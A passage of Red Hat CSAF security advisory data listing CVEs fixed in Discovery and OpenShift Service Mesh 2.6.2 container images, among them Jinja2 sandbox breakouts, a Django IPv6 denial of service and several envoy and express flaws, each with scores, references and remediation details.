"https://access.redhat.com/errata/RHSA-2025:1249", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "ADJACENT_NETWORK", availabilityImpact: "HIGH", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "nanoid: nanoid mishandles non-integer values", }, { cve: "CVE-2024-56201", cwe: { id: "CWE-150", name: "Improper Neutralization of Escape, Meta, or Control Sequences", }, discovery_date: "2024-12-23T16:00:38.768252+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2333854", }, ], notes: [ { category: "description", text: "A flaw was found in the Jinja2 package. A bug in the Jinja compiler allows an attacker that controls both the content and filename of a template to execute arbitrary Python code, regardless of Jinja's sandbox being used. An attacker needs to be able to control both the filename and the contents of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications that execute untrusted templates where the template author can also choose the template filename.", title: "Vulnerability description", }, { category: "summary", text: "jinja2: Jinja has a sandbox breakout through malicious filenames", title: "Vulnerability summary", }, { category: "other", text: "This vulnerability has rated as a IMPORTANT flaw because an attacker controlling both the template content and filename to execute arbitrary Python code, bypassing the sandbox.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-56201", }, { category: "external", summary: "RHBZ#2333854", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2333854", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-56201", url: "https://www.cve.org/CVERecord?id=CVE-2024-56201", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-56201", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-56201", }, { category: "external", summary: "https://github.com/pallets/jinja/commit/767b23617628419ae3709ccfb02f9602ae9fe51f", url: "https://github.com/pallets/jinja/commit/767b23617628419ae3709ccfb02f9602ae9fe51f", }, { category: "external", summary: "https://github.com/pallets/jinja/issues/1792", url: "https://github.com/pallets/jinja/issues/1792", }, { category: "external", summary: "https://github.com/pallets/jinja/releases/tag/3.1.5", url: "https://github.com/pallets/jinja/releases/tag/3.1.5", }, { category: "external", summary: "https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699", url: "https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699", }, ], release_date: "2024-12-23T15:37:36.110000+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, { category: "workaround", details: "To mitigate this vulnerabilty restrict user-controlled template filenames, ensuring they follow a predefined templates.", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 7.3, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "jinja2: Jinja has a sandbox breakout through malicious filenames", }, { cve: "CVE-2024-56326", cwe: { id: "CWE-693", name: "Protection Mechanism Failure", }, discovery_date: "2024-12-23T16:00:46.619763+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2333856", }, ], notes: [ { category: "description", text: "A flaw was found in the Jinja package. In affected versions of Jinja, an oversight in how the Jinja sandboxed environment detects calls to str.format allows an attacker that controls the content of a template to execute arbitrary Python code. To exploit the vulnerability, an attacker needs to control the content of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications that execute untrusted templates. Jinja's sandbox does catch calls to str.format and ensures they don't escape the sandbox. However, storing a reference to a malicious string's format method is possible, then passing that to a filter that calls it. No such filters are built into Jinja but could be present through custom filters in an application. After the fix, such indirect calls are also handled by the sandbox.", title: "Vulnerability description", }, { category: "summary", text: "jinja2: Jinja has a sandbox breakout through indirect reference to format method", title: "Vulnerability summary", }, { category: "other", text: "This vulnerability is rated as Moderate due to an oversight in Jinja's sandbox environment, allowing attackers to execute arbitrary Python code through controlled template content. This requires control over template content, making exploitation possible only in specific applications, thus limiting its overall impact.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-56326", }, { category: "external", summary: "RHBZ#2333856", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2333856", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-56326", url: "https://www.cve.org/CVERecord?id=CVE-2024-56326", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-56326", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-56326", }, { category: "external", summary: "https://github.com/pallets/jinja/commit/48b0687e05a5466a91cd5812d604fa37ad0943b4", url: "https://github.com/pallets/jinja/commit/48b0687e05a5466a91cd5812d604fa37ad0943b4", }, { category: "external", summary: "https://github.com/pallets/jinja/releases/tag/3.1.5", url: "https://github.com/pallets/jinja/releases/tag/3.1.5", }, { category: "external", summary: "https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h", url: "https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h", }, ], release_date: "2024-12-23T15:43:49.400000+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 6.3, baseSeverity: "MEDIUM", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "HIGH", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "jinja2: Jinja has a sandbox breakout through indirect reference to format method", }, { cve: "CVE-2024-56374", cwe: { id: "CWE-770", name: "Allocation of Resources Without Limits or Throttling", }, discovery_date: "2025-01-14T20:01:09.167282+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2337996", }, ], notes: [ { category: "description", text: "A flaw was found in the Django framework. Lack of upper bound limit enforcement in strings passed when performing IPv6 validation could lead to a potential denial of service attack. The undocumented and private functions `clean_ipv6_address` and `is_valid_ipv6_address` were vulnerable, as was the `django.forms.GenericIPAddressField` form field, which has now been updated to define a `max_length` of 39 characters.", title: "Vulnerability description", }, { category: "summary", text: "django: potential denial-of-service vulnerability in IPv6 validation", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-56374", }, { category: "external", summary: "RHBZ#2337996", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2337996", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-56374", url: "https://www.cve.org/CVERecord?id=CVE-2024-56374", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-56374", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-56374", }, { category: "external", summary: "http://www.openwall.com/lists/oss-security/2025/01/14/2", url: "http://www.openwall.com/lists/oss-security/2025/01/14/2", }, { category: "external", summary: "https://docs.djangoproject.com/en/dev/releases/security/", url: "https://docs.djangoproject.com/en/dev/releases/security/", }, { category: "external", summary: "https://groups.google.com/g/django-announce", url: "https://groups.google.com/g/django-announce", }, { category: "external", summary: "https://www.djangoproject.com/weblog/2025/jan/14/security-releases/", url: "https://www.djangoproject.com/weblog/2025/jan/14/security-releases/", }, ], release_date: "2025-01-14T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.8, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "django: potential denial-of-service vulnerability in IPv6 validation", }, ], }
RHSA-2024:7726
Vulnerability from csaf_redhat
Published
2024-10-07 09:24
Modified
2025-04-10 00:21
Summary
Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.6.2
Notes
Topic
Red Hat OpenShift Service Mesh Containers for 2.6.2
This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a
detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.
Security Fix(es):
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
* express: Improper Input Handling in Express Redirects (CVE-2024-43796)
* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule
(CVE-2024-43788)
* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* envoy: Malicious log injection via access logs (CVE-2024-45808)
* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)
* envoy: Envoy crashes for `LocalReply` in HTTP async client (CVE-2024-45810)
* curl: libcurl: ASN.1 date parser overread (CVE-2024-7264)
* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Service Mesh Containers for 2.6.2\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a\ndetailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.", title: "Topic", }, { category: "general", text: "Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.\n\nSecurity Fix(es):\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n* express: Improper Input Handling in Express Redirects (CVE-2024-43796)\n* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule\n(CVE-2024-43788)\n* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n* envoy: Malicious log injection via access logs (CVE-2024-45808)\n* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)\n* envoy: Envoy crashes for `LocalReply` in HTTP async client (CVE-2024-45810)\n* curl: libcurl: ASN.1 date parser overread (CVE-2024-7264)\n* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:7726", url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2301888", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2301888", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "2313683", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313683", }, { category: "external", summary: "2313685", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313685", }, { category: "external", summary: "2313687", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313687", }, { category: "external", summary: "OSSM-3337", url: "https://issues.redhat.com/browse/OSSM-3337", }, { category: "external", summary: "OSSM-8001", url: "https://issues.redhat.com/browse/OSSM-8001", }, { category: "external", summary: "OSSM-8099", url: "https://issues.redhat.com/browse/OSSM-8099", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7726.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.6.2", tracking: { current_release_date: "2025-04-10T00:21:36+00:00", generator: { date: "2025-04-10T00:21:36+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2024:7726", initial_release_date: "2024-10-07T09:24:48+00:00", revision_history: [ { date: "2024-10-07T09:24:48+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-07T09:24:48+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-10T00:21:36+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "RHOSSM 2.6 for RHEL 8", product: { name: "RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6", product_identification_helper: { cpe: "cpe:/a:redhat:service_mesh:2.6::el8", }, }, }, { category: "product_name", name: "RHOSSM 2.6 for RHEL 9", product: { name: "RHOSSM 2.6 for RHEL 9", product_id: "9Base-RHOSSM-2.6", product_identification_helper: { cpe: "cpe:/a:redhat:service_mesh:2.6::el9", }, }, }, ], category: "product_family", name: "Red Hat OpenShift Service Mesh", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.89.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", product_id: "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.6.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", product_id: "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.89.4-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", product: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", product_id: "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", product_identification_helper: { purl: "pkg:oci/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator&tag=1.89.6-1", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.6.2-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", product: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", product_id: "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", product_identification_helper: { purl: "pkg:oci/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", product_id: "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", product: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", product_id: "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", product_identification_helper: { purl: 